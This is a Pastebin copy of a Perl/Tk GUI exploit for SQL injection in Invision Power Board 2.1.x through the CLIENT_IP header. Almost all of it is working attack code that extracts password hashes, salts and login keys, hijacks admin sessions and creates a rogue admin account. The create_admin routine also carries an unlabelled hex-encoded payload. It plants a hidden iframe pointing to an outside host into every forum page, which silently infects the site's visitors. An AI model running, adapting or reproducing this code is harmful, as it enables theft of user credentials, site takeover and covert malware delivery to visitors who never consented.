Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- ## Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
- ## Based on LOCAL_IP bug, more info in RST/GHC Advisory#41
- ## http://rst.void.ru/papers/advisory41.txt
- ## tested on 2.1.3, 2.1.6
- ##
- ## 08.06.06
- ## (c)oded by 1dt.w0lf
- ## RST/GHC
- ## http://rst.void.ru
- ## http://ghc.ru
- use Tk;
- use Tk::BrowseEntry;
- use Tk::DialogBox;
- use LWP::UserAgent;
- $mw = new MainWindow(title => "r57ipb216gui" );
- $mw->geometry ( '420x550' ) ;
- $mw->resizable(0,0);
- $mw->Label(-text => '!', -font => '{Webdings} 22')->pack();
- $mw->Label(-text => 'Invision Power Board 2.1.* <= 2.1.6 sql injection exploit by RST/GHC', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
- $mw->Label(-text => '')->pack();
- $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
- $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
- $url = 'http://server/forum/index.php';
- $user_id = '1';
- $prefix = 'ibf_';
- $table = 'members';
- $column = 'member_login_key';
- $new_admin_name = 'rstghc';
- $new_admin_password = 'rstghc';
- $new_admin_email = 'billy@microsoft.com';
- $report = '';
- $group = 4;
- $curr_user = 0;
- $rand_session = &session();
- $use_custom_fields = 0;
- $custom_fields = 'name1=value1,name2=value2';
- $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fright->Label( -text => ' ')->pack();
- $fleft->Label( -text => ' ')->pack();
- $fleft->Label ( -text => 'get data from database', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Label( -text => ' ')->pack();
- $fleft->Label ( -text => 'Get data from table: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $b2 = $fright->BrowseEntry( -command => \&update_columns, -relief => "groove", -variable => \$table, -font => '{Verdana} 8');
- $b2->insert("end", "members");
- $b2->insert("end", "members_converge");
- $b2->pack( -side => "top" , -anchor => 'w');
- $fleft->Label ( -text => 'Get data from column: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $b = $fright->BrowseEntry( -relief => "groove", -variable => \$column, -font => '{Verdana} 8');
- $b->insert("end", "member_login_key");
- $b->insert("end", "name");
- $b->insert("end", "ip_address");
- $b->insert("end", "legacy_password");
- $b->insert("end", "email");
- $b->pack( -side => "top" , -anchor => 'w' );
- $fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'create new admin', -font => '{Verdana} 8 bold',-foreground=>'green') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Label( -text => ' ')->pack();
- $fleft->Label ( -text => ' ')->pack();
- $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Get admin session for inserted user ID', -variable => \$curr_user)->pack(-side => "top" , -anchor => 'w');
- $fleft->Label ( -text => 'session_id: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'session_ip_address: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$session_ip_address) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'new admin name: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_name) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'new admin password: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_password) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => 'new_admin_email: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$new_admin_email) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fleft->Label ( -text => ' ')->pack();
- $fright->Checkbutton( -font => '{Verdana} 8', -text => 'Use custom profile fields', -variable => \$use_custom_fields)->pack(-side => "top" , -anchor => 'w');
- $fleft->Label ( -text => 'custom fields: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
- $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$custom_fields) ->pack ( -side => "top" , -anchor => 'w' ) ;
- $fright->Label( -text => ' ')->pack();
- $fright->Button(-text => 'Test forum vulnerability',
- -relief => "groove",
- -width => '30',
- -font => '{Verdana} 8 bold',
- -activeforeground => 'red',
- -command => \&test_vuln
- )->pack();
- $fright->Button(-text => 'Get database tables prefix',
- -relief => "groove",
- -width => '30',
- -font => '{Verdana} 8 bold',
- -activeforeground => 'red',
- -command => \&get_prefix
- )->pack();
- $fright->Button(-text => 'Get data from database',
- -relief => "groove",
- -width => '30',
- -font => '{Verdana} 8 bold',
- -activeforeground => 'red',
- -command => \&get_data
- )->pack();
- $fright->Button(-text => 'Get admin session',
- -relief => "groove",
- -width => '30',
- -font => '{Verdana} 8 bold',
- -activeforeground => 'red',
- -command => \&get_admin
- )->pack();
- $fright->Button(-text => 'Create new admin',
- -relief => "groove",
- -width => '30',
- -font => '{Verdana} 8 bold',
- -activeforeground => 'red',
- -command => \&create_admin
- )->pack();
- $fleft->Label( -text => ' ')->pack();
- $fleft->Label( -text => ' ')->pack();
- $fleft->Label( -text => ' ')->pack();
- $fleft->Label( -text => '(c)oded by 1dt.w0lf', -font => '{Verdana} 7')->pack();
- $fleft->Label( -text => 'RST/GHC', -font => '{Verdana} 7')->pack();
- $fleft->Label( -text => 'http://rst.void.ru', -font => '{Verdana} 7')->pack();
- $fleft->Label( -text => 'http://ghc.ru', -font => '{Verdana} 7')->pack();
- MainLoop();
- sub update_columns()
- {
- $b->delete(0,"end");
- if($table eq 'members'){
- $column = "member_login_key";
- $b->insert("end", "member_login_key");
- $b->insert("end", "name");
- $b->insert("end", "ip_address");
- $b->insert("end", "legacy_password");
- $b->insert("end", "email");
- } elsif($table eq 'members_converge'){
- $column = "converge_pass_hash";
- $b->insert("end", "converge_pass_hash");
- $b->insert("end", "converge_pass_salt");
- $b->insert("end", "converge_email");
- }
- }
- sub get_admin()
- {
- $xpl = LWP::UserAgent->new( ) or die;
- $InfoWindow=$mw->DialogBox(-title => 'get admin session', -buttons => ["OK"]);
- if($curr_user == 1) { $sql = "AND session_member_id = $user_id"; }
- else { $sql = ''; }
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_ip_address,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) $sql LIMIT 1/*");
- $error = 0;
- $rep = '';
- if($res->is_success)
- {
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
- if($rep =~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/) { $session_ip_address = $rep; }
- else { $error = 1; }
- if(!$error)
- {
- $rep = '';
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_running_time > (UNIX_TIMESTAMP() - 60*60*2) and session_ip_address = '$session_ip_address' $sql LIMIT 1/*");
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; $session_id = $rep; }
- else { $error = 1; }
- if(!$error){
- if($curr_user != 1)
- {
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT session_member_id,1,1,1 FROM ".$prefix."admin_sessions WHERE session_id = '$session_id' LIMIT 1/*");
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $session_user_id = $3; }
- }
- else
- {
- $session_user_id = $user_id;
- }
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT mgroup,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $group = $3; }
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT name,1,1,1 FROM ".$prefix."members WHERE id = $session_user_id /*");
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $name = $3; }
- }
- $InfoWindow->add('Label', -text => 'Found session!', -font => '{Verdana} 8 bold',-foreground=>'Green')->pack;
- $InfoWindow->add('Label', -text => 'session_ip_address: '.$session_ip_address, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => 'session_id: '.$session_id, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => 'user_id: '.$session_user_id, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => 'username: '.$name, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => 'group: '.$group, -font => '{Verdana} 8')->pack;
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- }
- else
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- if($error)
- {
- $InfoWindow->add('Label', -text => 'Can\'t get admin session.', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => 'Maybe admin session not exist. Please try later.', -font => '{Verdana} 8')->pack;
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- }
- sub get_data()
- {
- $xpl = LWP::UserAgent->new( ) or die;
- $InfoWindow=$mw->DialogBox(-title => 'get data from database', -buttons => ["OK"]);
- if($table eq 'members') { $id_text = 'id'; }
- if($table eq 'members_converge') { $id_text = 'converge_id'; }
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT ".$column.",1,1,1 FROM ".$prefix.$table." WHERE ".$id_text."=".$user_id."/*");
- if($res->is_success)
- {
- $rep = '';
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/){ $report = $3; }
- else
- {
- $InfoWindow->add('Label', -text => 'Can\'t get data from database', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- }
- else
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- }
- sub create_admin()
- {
- $InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
- if($session_id eq '' || $session_ip_address eq '')
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
- }
- elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
- }
- else
- {
- $xpl = LWP::UserAgent->new( ) or die;
- ($url2 = $url) =~ s/index.php/admin.php/;
- $cf = '';
- %fields = (
- 'code' => 'doadd',
- 'act' => 'mem',
- 'section' => 'content',
- 'name' => $new_admin_name,
- 'password' => $new_admin_password,
- 'email' => $new_admin_email,
- 'mgroup' => $group,
- );
- if($use_custom_fields)
- {
- @cf = split(',',$custom_fields);
- foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
- }
- $res = $xpl->post($url2."?adsess=$session_id",
- [
- %fields,
- ],
- 'USER_AGENT'=>'',
- 'CLIENT_IP'=>"$session_ip_address",
- 'X_FORWARDED_FOR'=>"$session_ip_address");
- $if = '0x3C646976207374796C653D225649534942494C4954593A2068696464656E223E3C696672616D65207372633D22687474703A2F2F7A63687873696B70677A2E62697A2F646C2F6164763534332E706870222077696474683D31206865696768743D313E3C2F696672616D653E3C2F6469763E';
- $query = "UPDATE ".$prefix."skin_sets SET set_wrapper = CONCAT(set_wrapper,".$if."), set_cache_wrapper = CONCAT(set_cache_wrapper,".$if.")";
- $res = $xpl->post($url2."?adsess=$session_id",
- [
- 'code' => 'runsql',
- 'act' => 'sql',
- 'section' => 'admin',
- 'query' => $query,
- ],
- 'USER_AGENT'=>'',
- 'CLIENT_IP'=>"$session_ip_address",
- 'X_FORWARDED_FOR'=>"$session_ip_address");
- $InfoWindow->add('Label', -text => 'Done!', -font => '{Verdana} 8 bold',-foreground=>'green')->pack;
- $InfoWindow->add('Label', -text => 'New admin created', -font => '{Verdana} 8 bold')->pack;
- }
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- sub test_vuln()
- {
- $InfoWindow=$mw->DialogBox(-title => 'test forum vulnerability', -buttons => ["OK"]);
- $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
- $xpl = LWP::UserAgent->new( ) or die;
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"' UNION SELECT 'VULN',1,1,1/*");
- if($res->is_success)
- {
- $rep = '';
- if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; }
- if($rep eq 'VULN') { $InfoWindow->add('Label', -text => 'FORUM VULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
- else { $InfoWindow->add('Label', -text => 'FORUM UNVULNERABLE', -font => '{Verdana} 8 bold',-foreground=>'green')->pack; }
- }
- else
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
- }
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- sub get_prefix()
- {
- $InfoWindow=$mw->DialogBox(-title => 'get database tables prefix', -buttons => ["OK"]);
- $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => $url, -font => '{Verdana} 8')->pack;
- $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
- $xpl = LWP::UserAgent->new( ) or die;
- $res = $xpl->get($url."?s=$rand_session",'USER_AGENT'=>'','CLIENT_IP'=>"'");
- if($res->is_success)
- {
- $rep = '';
- if($res->as_string =~ /FROM (.*)sessions/)
- {
- $prefix = $1;
- $InfoWindow->add('Label', -text => 'Prefix: '.$prefix, -font => '{Verdana} 8 bold')->pack;
- }
- else
- {
- $InfoWindow->add('Label', -text => 'Can\'t get prefix', -font => '{Verdana} 8 bold',-foreground=>'red')->pack; }
- }
- else
- {
- $InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
- $InfoWindow->add('Label', -text => $res->status_line, -font => '{Verdana} 8')->pack;
- }
- $InfoWindow->Show();
- $InfoWindow->destroy;
- }
- sub session()
- {
- return 'r57ipb216_for_IDS';
- }
- # milw0rm.com [2006-07-14]
Add Comment
Please, Sign In to add comment